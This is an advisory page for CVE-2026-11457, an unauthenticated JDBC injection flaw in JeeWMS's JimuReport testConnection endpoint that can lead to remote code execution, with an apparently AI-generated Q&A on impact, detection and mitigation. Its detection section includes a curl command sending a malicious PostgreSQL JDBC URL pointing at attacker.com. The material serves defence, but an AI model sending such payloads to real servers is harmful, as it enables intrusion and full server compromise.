CVE-2026-11457
JeeWMS JimuReport Test-Connection Endpoint Injection
Publication date: 2026-06-07
Last updated on: 2026-06-07
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-707 | The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in erzhongxmu JeeWMS in the JimuReport test-connection endpoint located at /base-boot/jmreport/testConnection. It allows an attacker to manipulate database connection parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword to perform injection attacks.
Specifically, the endpoint accepts attacker-controlled JDBC parameters without requiring authentication. By providing a malicious PostgreSQL JDBC URL with parameters like socketFactory and socketFactoryArg, an attacker can trigger arbitrary class instantiation through the Spring framework. This can lead to loading a remote Spring XML file controlled by the attacker, enabling execution of arbitrary commands on the server.
The endpoint is accessible without authentication because it is marked as anonymous in the Shiro security configuration, making remote exploitation possible and allowing full server compromise in some cases.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized remote code execution on the server running JeeWMS. An attacker can execute arbitrary commands, potentially gaining full control over the server.
Even if full remote code execution is not achieved, the flaw allows critical unauthenticated JDBC abuse such as arbitrary class instantiation and outbound network requests, which can be leveraged for further attacks.
Because the vulnerable endpoint does not require authentication, attackers can exploit it remotely without any credentials, increasing the risk and ease of attack.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the accessibility and behavior of the `/base-boot/jmreport/testConnection` endpoint on the target system. Since the endpoint accepts unauthenticated JDBC parameters, you can attempt to send crafted HTTP requests with malicious JDBC URLs to observe if the system processes them.
For detection, you can use tools like curl or any HTTP client to send requests to the endpoint with parameters such as dbType, dbDriver, dbUrl, dbUsername, and dbPassword. For example, sending a request with a PostgreSQL JDBC URL containing parameters like `socketFactory` and `socketFactoryArg` can help verify if the endpoint is vulnerable.
- curl -X POST "http://target-system/base-boot/jmreport/testConnection" -d "dbType=postgresql&dbDriver=org.postgresql.Driver&dbUrl=jdbc:postgresql://attacker.com:5432/db?socketFactory=attacker.Class&socketFactoryArg=arg&dbUsername=user&dbPassword=pass"
If the server responds without authentication and processes the request, it indicates the endpoint is accessible and potentially vulnerable to injection and remote code execution.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the `/base-boot/jmreport/testConnection` endpoint to trusted users only, ideally requiring authentication and authorization.
Since the vulnerability arises because the endpoint is marked as anonymous in the Shiro configuration, updating the security configuration to require valid authentication tokens for accessing `/jmreport/**` endpoints is critical.
Additionally, consider disabling or removing the testConnection endpoint if it is not necessary in production environments.
Monitor network traffic for suspicious outbound connections or unusual activity originating from the application server, as exploitation involves loading remote resources.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows unauthenticated remote code execution and arbitrary command execution on the affected system, potentially leading to unauthorized access to sensitive data.
Such unauthorized access and potential data breaches can negatively impact compliance with data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and ensuring system integrity.
Because the vulnerability enables full server compromise without authentication, it increases the risk of data exposure, manipulation, or loss, which are critical compliance concerns under these standards.